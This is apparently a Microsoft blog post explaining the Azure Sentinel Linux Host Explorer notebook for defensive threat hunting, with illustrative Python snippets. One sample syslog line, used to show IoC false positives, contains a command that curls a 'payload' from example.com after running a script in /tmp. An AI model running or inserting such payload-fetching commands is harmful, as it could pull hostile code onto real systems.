Explorer Notebook Series: The Linux Host Explorer

Azure Sentinel has integrated Azure Notebooks to allow security analysts to use Jupyter Notebooks to hunt and investigate threats. To learn more about using Jupyter Notebooks in security investigations check out the 3 part blog we released last year: Part 1, Part 2, Part 3.

To support usage of Jupyter Notebooks, Microsoft has produced a range of Explorer Notebooks to allow analysts to leverage the capabilities and power of Notebooks to investigate common entities including:

Linux Host

Windows Host

Domains & URL

IP Address

Process

Office 365 activity

Each of these Notebooks is built using Microsoft Threat Intelligence Center’s (MSTIC) Python security tool library, MSTICpy.

This blog will look in detail at the Linux Host Explorer Notebook, explain what each section of the Notebook is intended to do and how it should be used. Further blogs covering the other explorer Notebooks will be released over time.

Note: These Notebooks are still under active development and will be updated over time with new features, therefore the Notebook presented in this blog may vary slightly from the current Notebook presented via the Azure Sentinel portal.

You can use the animated images in this document to help understand what is happening at each stage, however a better experience will be had if you run the Notebook yourself as you read through this blog.

Azure Notebooks Setup

Before using the Notebooks, a number of setup steps are required to configure the Azure Notebooks environment. Details of these steps can be found here: https://docs.microsoft.com/en-us/azure/sentinel/notebooks [1]

Once you have completed these setup steps you can launch the Entity Explorer – Linux Host Notebook. Note that all the Notebooks provided use Python 3.6 so please make sure your Azure Notebooks kernel is set to Python 3.6 once loaded. This can be done by selecting Kernel > Change kernel > Python 3.6.

If this is the first time running this Notebook the first thing you will need to do is ensure the required packages are installed. These packages are detailed in the Setup Cell at the end of the Notebook. You can navigate there via the Table of Contents or by scrolling to the end of the Notebook. Running the setup cell will install MSTICpy and any other required packages. It can take a number of minutes to download and install the required packages. Once complete, make sure you restart the kernel the Notebook is running in to ensure the latest packages are used. This can be done using the menu button at the top of the Notebook.

Animated image of running the Notebook setup cells

Configuring the Explorer Notebook

Once you have run the required setup you can return to the top of the Notebook. Here you will find details about the data sources used by the Notebook, what the Notebook is trying to achieve, and the Hunting Hypothesis. This hypothesis details the focus of the Notebook’s investigative features and guides the path that it takes. For the Linux Explorer the hypothesis is as follows:

“Our broad initial hunting hypothesis is that a particular Linux host in our environment has been compromised, we will need to hunt from a range of different positions to validate or disprove this hypothesis.”

This is a broad hypothesis to ensure the Notebook remains relevant for a large number of investigations and threat hunts.

The next cell is titled Notebook Setup. This cell imports a number of packages to be used in the Notebook and sets some variables to be used later.

Animated image showing running the Notebook import cells

Authenticating to Azure Sentinel

Once the configuration is done we can connect to Azure Sentinel to collect the data needed for the Notebook’s investigation features. The connections are handled by MSTICpy’s data connector features. The two cells in the Explorer Notebook under ‘Get WorkspaceId and Authenticate to Log Analytics’ first get the details of the Azure Sentinel Workspace from configuration files (or if they are not present prompt the user to enter them). Details on these configuration files can be found here: https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html

Once the Workspace details are collected the next cell connects to the Workspace. During this connection the Notebook will load a feature called KQLMagic and you will be provided with a device code and a button to copy the code and authenticate. Clicking this button will open a new browser window where you can paste the provided code, after which you will be prompted to authenticate to the Workspace. You can authenticate with any account that you would normally use to access the Workspace via the Azure Portal. Once you have successfully connected the new browser window will automatically close and you can continue with the Notebook.

Animated image showing the running of the Notebook authentication cells

Scoping the Investigation

Once connected we need to select the host we are investigating and the timeframe we are investigating it in. To set the timeframe, run the cell under “Set Hunting Time Frame”. This will provide you with a time slider that you can drag to set the timeframe you wish to investigate. If you need to adjust this timeframe later simply rerun this cell and change the slider.

The cell under the time slider will prompt you to enter the name of the host you wish to investigate. You can choose to enter a full name, partial name, or no name. If a full or partial name is entered the next cell will search across all Linux host data in your workspace to identify a match for that hostname. If a unique match is found that host is set as the focus for the investigation. Alternatively, if multiple hosts are found matching the partial or full name these will be displayed for you to select which one you wish to focus on. If no host is entered all the hosts for which data is present in the timeframe set will be presented for you to choose from. Please note this Explorer Notebook is designed to be focused on one host at a time, therefore only a single host can be selected.

Animated image showing running of Notebook scoping cells
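
The host selection behavior described above can be sketched in a few lines of Python. This is only an illustration of the matching logic, not the Notebook's actual code: the function name match_hosts and the sample host names are assumptions made up for this example.

```python
def match_hosts(known_hosts, search_term=""):
    """Return (selected_host, candidates) for a full, partial, or empty name.

    Hypothetical helper: a case-insensitive substring match is assumed here.
    """
    term = search_term.strip().lower()
    # An empty term is a substring of every name, so all hosts are candidates.
    candidates = sorted({host for host in known_hosts if term in host.lower()})
    # Only a unique match is selected automatically; otherwise the analyst chooses.
    selected = candidates[0] if len(candidates) == 1 else None
    return selected, candidates


# Made-up host names standing in for hosts with data in the selected timeframe.
hosts = ["web-linux-01", "web-linux-02", "db-linux-01"]

unique_match = match_hosts(hosts, "db")
multiple_matches = match_hosts(hosts, "web")
no_name_entered = match_hosts(hosts, "")
```

With these sample hosts, "db" resolves to a single host, while "web" and an empty name both return a list for the analyst to pick from.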

Host Overview

The next three cells provide an overview of the host. The first will collect a range of information about the host including details on OS, IP address, location, and installed services. This is intended to provide some context on the host being investigated, what role it might fulfill and where in the environment it resides. The granularity of this data will depend on whether the host is running in Azure and what extensions are enabled.

Following this are two cells providing details on alerts associated with the host in the last 30 days. The first cell will present these alerts in an interactive timeline view, this helps provide a visual representation of recent alert activity with the host and identifies potentially relevant alert patterns. You can pan and zoom on the timeline and hovering over a point will provide you with more details of the alert. Below this you are presented with a list view of all the alerts in the timeline, you can select an alert from the list to see the full details of the alert from Azure Sentinel. To view details of a different alert simply select another alert from the list. Before continuing with the Notebook select the alert you wish to focus on further, details of this alert will be used to scope elements of the investigation going forward.

Animated image showing running the Notebook host cells

From this point the Notebook provides a series of analytics and visualizations focused on different areas. You can choose to run these sections in order or jump to a specific area of interest. At various points in this Notebook menu items are provided to allow you to jump to specific sections (you can also use the Table of Contents at the top of the Notebook). Whilst all the sections can be run independently, each cell within a section ties to previous cells and therefore cells within each section must be run in order. In addition, all sections require you to complete the initial cells of authentication, scoping, and host overview.

Host Logons

Most Linux based intrusions involve attackers authenticating against infrastructure at some point, either as part of an initial compromise or later during lateral movement. Therefore the first analytics section in the Notebook is focused on Host Logons. Running this section will return a number of visualizations to help you understand the types of logons observed by the host within the time frame being investigated.

The first thing you will see when running the cell under ‘Host Logon Events’ is another timeline. This timeline provides a breakdown of failed and successful logon attempts to the host. Overlaid on this is a marker showing the time of the alert you selected previously to provide a reference point. As with the alert timeline you can scroll, pan, zoom and hover on items in the timeline in order to get more details. This timeline is particularly useful for identifying anomalous logon patterns such as brute force attempts.

Animated image of the host logons timeline

Below this are a number of graphs showing a breakdown of logon attempts by various factors including whether they were successful or not, what user account was involved, and what process was involved. Again, these help quickly identify any elements that may stand out due to volume or scarcity.

Finally, there is a map showing the location of the source IP address associated with each logon attempt. The location is based on IP geolocation and therefore should not be considered 100% reliable. However, it provides a useful guide to where logon attempts are coming from and can easily highlight logons from anomalous locations. Red markers are used to show failed logons, and green ones to show successful logons. You can zoom and pan the map to view these events as you wish. Please note that if failed logons have occurred from the same location as successful ones the red marker will be behind the green marker, meaning that it may not be visible.

Animated image showing the host logon graphs and map
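
The kind of breakdown these graphs present can be approximated with simple counting. The following is a minimal sketch using made-up logon records. The field names (user, process, result) and the helper functions are assumptions for illustration and do not reflect the Notebook's internal data model.

```python
from collections import Counter

# Hypothetical, simplified logon records; real records would be parsed from syslog.
logons = [
    {"user": "root", "process": "sshd", "result": "Failure"},
    {"user": "root", "process": "sshd", "result": "Failure"},
    {"user": "root", "process": "sshd", "result": "Failure"},
    {"user": "alice", "process": "sshd", "result": "Success"},
    {"user": "alice", "process": "su", "result": "Success"},
]


def breakdown(records, field):
    """Count logon attempts by one field (result, user, or process)."""
    return Counter(record[field] for record in records)


def rarest(counts):
    """Return the value(s) with the lowest count, which may stand out by scarcity."""
    lowest = min(counts.values())
    return sorted(value for value, count in counts.items() if count == lowest)


by_result = breakdown(logons, "result")
by_user = breakdown(logons, "user")
by_process = breakdown(logons, "process")
```

Looking at both ends of each count (most_common for volume, rarest for scarcity) mirrors the two ways an element can stand out in the graphs.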

Session Investigations

After looking at all logon events for the host we can choose to look closer at specific logon sessions. Running the cell under ‘Logon Sessions’ will return a list of all logon sessions, the session start time and end time, and the user involved. It will also show if the account is a root account on the host, if there was an alert associated with the host during that logon session, and the ratio of successful to failed logon events for that user account. If any of these elements are highlighted in yellow this indicates they may be logon sessions to focus on. Below the list of logons sessions is a selection box from which you can select the session you wish to focus further investigation on.
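
To make the three indicators concrete, here is a rough sketch of how they might be derived for one session. The LogonSession class, the session_flags function, and the treatment of "root" as the only root account are assumptions for this example. The Notebook's own thresholds for highlighting are not described here and are not reproduced.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass
class LogonSession:
    user: str
    start: datetime
    end: datetime


def session_flags(session, alert_times, successes, failures, root_users=("root",)):
    """Compute the three per-session indicators (illustrative only)."""
    # Ratio of successful to failed logons; undefined when there are no failures.
    ratio = successes / failures if failures else None
    return {
        "is_root": session.user in root_users,
        "alert_in_session": any(
            session.start <= alert <= session.end for alert in alert_times
        ),
        "success_to_failure_ratio": ratio,
    }


session = LogonSession("root", datetime(2020, 1, 1, 9, 0), datetime(2020, 1, 1, 9, 30))
flags = session_flags(session, [datetime(2020, 1, 1, 9, 10)], successes=2, failures=8)
```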

Once you have selected a session the next cell will return a range of details on host activity during that session. This includes a breakdown of cron activity, sudo commands run, and users added, removed, or modified. If there are multiple users on the host simultaneously this activity will relate to all logon sessions on that host during the session time window. This is because the Notebook relies on syslog data, which means associating host activity with specific logon sessions is not possible in a reliable manner. At the bottom of this cell is another timeline providing an overview of all the activity detailed in the cell. This again provides a very useful visual reference as to the chronology of events and what relationship they may have to each other.

Animated image showing session selection cells running
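
The caveat about simultaneous users follows directly from filtering on time alone. The sketch below uses made-up syslog messages and a hypothetical activity_in_window helper to show that a time-window filter returns activity from every user active in the window, not just the owner of the selected session.

```python
from datetime import datetime

# Made-up syslog events; note there is no session identifier to filter on.
events = [
    {"time": datetime(2020, 1, 1, 9, 5),
     "message": "sudo: alice : COMMAND=/usr/bin/apt update"},
    {"time": datetime(2020, 1, 1, 9, 12),
     "message": "CRON: (bob) CMD (/home/bob/backup.sh)"},
    {"time": datetime(2020, 1, 1, 10, 30),
     "message": "sudo: alice : COMMAND=/usr/bin/systemctl restart nginx"},
]


def activity_in_window(records, start, end):
    """Return every event whose timestamp falls inside the session window."""
    return [record for record in records if start <= record["time"] <= end]


# Window of a hypothetical session belonging to alice.
session_activity = activity_in_window(
    events, datetime(2020, 1, 1, 9, 0), datetime(2020, 1, 1, 9, 30)
)
```

Here bob's cron job is returned alongside alice's sudo command because it happened inside the same window.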

The two cells at the end of the section return raw syslog data to allow for further investigation, the first focusses on syslog associated with sudo events and is filtered by the sudo command run. To change the displayed syslog simply select the command you wish to focus on and the table will update. The next cell does the same but for all syslog generated during the logon session and is broken down by facility.

Animated image showing cells outputting user session log data

Another useful datapoint for security analysts is process creation activity, so the next cell produces a process tree for the analyst to interact with. The tree is created from auditd data, therefore you must have auditd enabled for this host and the auditd data must be collected by Azure Sentinel [2]. In addition, due to the volume of data generated by auditd this cell can take some time to execute. If you are unsure whether the cell is still executing you can use the kernel indicator in the top right of the Notebook window. If the indicator is a solid color this indicates that the kernel is still executing.

Once complete, the process tree displayed can be interacted with in the same way as the timelines seen previously. You can hover to get more details, scroll, pan, zoom, and use the sidebar to get a broader overview of the whole process tree.

Animated image showing running of the session process tree cells

Sudo session investigation

Syslog provides us only limited details of user activity on the host, the exception being when a user conducts actions with elevated privileges using sudo. Given the power of sudo this provides a useful insight into potential attacker activity, therefore the next cells provide an insight into sudo activity within the user logon session selected previously.

Given that multiple sudo sessions may occur during a single logon session the first cell allows you to select a particular sudo session to focus on, with the subsequent cell providing details of all syslog associated with this session. In addition, any Indicators of Compromise (IoCs) present in the syslog messages related to the sudo session will be extracted and looked up in Threat Intelligence feeds to help identify any sudo activity that may be malicious.

Note: The IoC extraction can occasionally generate false positives, this is due to the difficulty in identifying the difference between say a domain name and a file name e.g. google.sh is a valid domain but could also be the name of a shell script.
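
The ambiguity is easy to reproduce with a naive pattern-based extractor. The sketch below is not MSTICpy's IoC extraction code. The regular expression, the small KNOWN_TLDS set, and the sample message are simplified assumptions chosen only to show why a script name can look like a domain.

```python
import re

# Tiny illustrative set; a real extractor would check the full public TLD list.
KNOWN_TLDS = {"com", "net", "org", "io", "sh"}

# One or more dot-separated labels followed by an alphabetic TLD.
DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+([a-z]{2,}))\b", re.IGNORECASE)


def extract_domains(message):
    """Return substrings that look like domains with a recognized TLD."""
    return [
        match.group(1)
        for match in DOMAIN_RE.finditer(message)
        if match.group(2).lower() in KNOWN_TLDS
    ]


message = "sudo: alice : COMMAND=/bin/bash /tmp/google.sh ; curl http://example.com/payload"
found = extract_domains(message)
```

Both google.sh (a shell script in this message) and example.com (a genuine domain) are returned, because .sh is a valid top-level domain and the pattern alone cannot tell the two apart.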

This cell provides details on a single sudo session at a time, to view details on another session select it from the list in the first cell and rerun the analysis cell.

Animated image showing sudo session selection cells running

User Activity

During the course of your investigation or hunting activity you may identify a specific user to focus on, the next section of the Notebook is designed to cater for this. You can run this section individually or as a follow on from the host session cells we have just covered.

This section has a broader timeframe than the session-only section and instead covers all user activity in the timeframe set initially in the Notebook (under the “Select Host to Investigate” heading). The initial cell provides a list of users observed in the logs from which you can select a user to focus on. The follow-on cell provides an overview of the user’s activity. This is similar to the host logon view but is focused on activity only from the selected user.

Animated image showing the user investigation selection cells and user logon timeline

There is also a summary of all sudo activity associated with that user. This section helps highlight specific user activity that may be anomalous and therefore warrant further investigation using the session investigation cells.

Animated image showing the user investigation graphs and map

The final cell of the section extracts IoCs from all syslog messages associated with the user and looks them up in threat intelligence feeds in order to identify any known malicious activity.

Application Activity

In a similar fashion to the User Activity section, the Application Activity section allows you to focus your investigation on a specific application. This is particularly useful if you are searching for potential exploitation of a specific application or if you suspect an attacker may have run an application during their attack.

The first cell presents a list of applications for which logs are present that you can select from. The following cell presents an interactive graph of log volume from the application over time. This helps identify anomalous patterns or spikes over time. The first graph shows the volume of all logs generated by the application, the second one shows only high priority messages generated (‘emerg’, ‘alert’, ‘crit’, ‘err’, and ‘warning’). This separation can allow you to identify spikes in particularly interesting activity by removing the baseline of normal activity that might appear only as low priority messages.

Animated image showing the application investigation cells running
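
The effect of separating high priority messages from the overall volume can be sketched as follows. The event data is made up and the hourly_volume function and hourly bucketing are assumptions for illustration. Only the list of high priority severities is taken from the description above.

```python
from collections import Counter
from datetime import datetime

# Severities treated as high priority, as listed in the text above.
HIGH_PRIORITY = {"emerg", "alert", "crit", "err", "warning"}

# Made-up (timestamp, severity) pairs for one application.
events = [
    (datetime(2020, 1, 1, 10, 5), "info"),
    (datetime(2020, 1, 1, 10, 20), "info"),
    (datetime(2020, 1, 1, 10, 45), "err"),
    (datetime(2020, 1, 1, 11, 10), "info"),
    (datetime(2020, 1, 1, 11, 15), "crit"),
    (datetime(2020, 1, 1, 11, 30), "warning"),
]


def hourly_volume(records, only_high_priority=False):
    """Count messages per hour, optionally keeping only high priority ones."""
    counts = Counter()
    for timestamp, severity in records:
        if only_high_priority and severity not in HIGH_PRIORITY:
            continue
        # Truncate the timestamp to the start of its hour to form the bucket.
        counts[timestamp.replace(minute=0, second=0, microsecond=0)] += 1
    return dict(sorted(counts.items()))


all_logs = hourly_volume(events)
high_priority_logs = hourly_volume(events, only_high_priority=True)
```

In this sample the total volume is flat across both hours, while the high priority count doubles in the second hour, which is the kind of change the second graph is intended to surface.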

The other two cells in this section produce a process tree for the selected application. Because process tree generation relies on auditd data, and data volumes can be large, there is a cell that lets you narrow the query timeframe to a smaller window. The following cell, which generates the process tree, checks how many logs are being returned and if the number surpasses 100,000 it will prompt you to confirm whether you wish to continue. Due to the high likelihood of a timeout with more than 100,000 lines of data it is strongly suggested that you adjust your timeframe if you are presented with this warning. If you need to query more data than this you can run this cell multiple times to generate process trees for different timeframes. The process tree returned is in the same format as the one generated in the session section and can be interacted with in the same way.

Animated image showing application process tree cell running
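
The size check and the "run it several times over smaller windows" workaround can be sketched like this. The 100,000 limit comes from the text above, while the function names and the even splitting strategy are assumptions for this example rather than the Notebook's implementation.

```python
from datetime import datetime

MAX_ROWS = 100_000  # limit described in the text above


def needs_confirmation(row_count, limit=MAX_ROWS):
    """Return True when the result is large enough to risk a timeout."""
    return row_count > limit


def split_window(start, end, parts):
    """Split a timeframe into equal consecutive sub-windows."""
    step = (end - start) / parts
    return [(start + i * step, start + (i + 1) * step) for i in range(parts)]


# Split a one-day timeframe into four six-hour windows to query separately.
windows = split_window(datetime(2020, 1, 1), datetime(2020, 1, 2), 4)
```

Each sub-window could then be queried on its own to produce one process tree per timeframe.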

The final cell will extract IoCs from all logs associated with the selected application, look up these IoCs in threat intelligence feeds and if a match is made then return that matched IoC and the syslog message it was present in.

Animated image showing application data IoC extraction cells running

Network Activity

The final analytical section of this Notebook focusses on Network activity. This section utilizes Azure Network Flow data, as well as identifying network activity present in syslog (such as SSH connection attempts). If Azure Flow Data is present the first cell will display a number of visualizations detailing network flow broken down by protocol and direction, if only syslog data is available these visualizations are not shown due to a lack of reliable data regarding flow direction or protocol.

The next cells allow you to focus your investigation on specific IP addresses. Due to the volume of IP addresses often seen, the first cell will resolve the ASN owner for each address and present a list of ASNs for you to select from. The cell after this will list all the observed IP addresses associated with that ASN, from which you can select a specific IP address to look at further. The final cell will then look up the selected IP address in threat intelligence, return details on any matches and also return details on all syslog messages containing the IP address to help you identify where malicious activity may have occurred.

Animated image showing network analysis cells running
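
Grouping addresses by ASN is what makes a long list of IP addresses manageable. The sketch below shows the grouping step only. It assumes the ASN owner has already been resolved and uses a hard-coded, made-up lookup table with documentation-range IP addresses and AS numbers in place of a real lookup service.

```python
from collections import defaultdict

# Made-up IP-to-ASN mapping; a real Notebook would resolve this via a lookup.
ASN_LOOKUP = {
    "192.0.2.10": "AS64500 EXAMPLE-NET-A",
    "192.0.2.11": "AS64500 EXAMPLE-NET-A",
    "198.51.100.7": "AS64501 EXAMPLE-NET-B",
}


def group_by_asn(ip_addresses, asn_lookup):
    """Group observed IP addresses under their ASN owner."""
    groups = defaultdict(set)  # a set removes repeated sightings of one address
    for ip_address in ip_addresses:
        groups[asn_lookup.get(ip_address, "Unknown ASN")].add(ip_address)
    return {asn: sorted(addresses) for asn, addresses in groups.items()}


observed = ["192.0.2.11", "198.51.100.7", "192.0.2.10", "203.0.113.5", "192.0.2.10"]
groups = group_by_asn(observed, ASN_LOOKUP)
```

An analyst would first pick an ASN from the keys of groups, then pick one address from that ASN's list for the threat intelligence lookup.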

Summary

The Linux Explorer Notebook is a powerful tool for investigating a Linux host or hunting for threats. It can be used as an end-to-end investigation flow or used in sections as required based on the flow and focus of the investigation. However, it does not cover every conceivable scenario or environment. The real value of Notebooks is that this isn’t a limitation: you can customize these Notebooks to fit your needs, or you can create your own Notebook using elements from the Notebooks we have provided or entirely from scratch. There are virtually endless possibilities.

If you are looking to create your own Notebooks please make sure you check out MSTICpy as there is a good chance that it will contain features that will save you time and effort in creating what you need. Also, we are keen for any input, suggestions, issues or contributions to MSTICpy so please do feel free to contribute if you wish. In the same vein, if you have a Notebook that you would like to see included in the Azure Sentinel portal please let us know in the comments below or raise an issue on GitHub. We are always keen to get feedback and ideas from our customers.

[1] If you don’t want to use Azure Notebooks you can also download the Explorer Notebook and run it from a local Jupyter instance.

[2] https://msticpy.readthedocs.io/en/latest/data_acquisition/CollectingLinuxAuditLogs.html#configure-auditing-on-your-linux-vms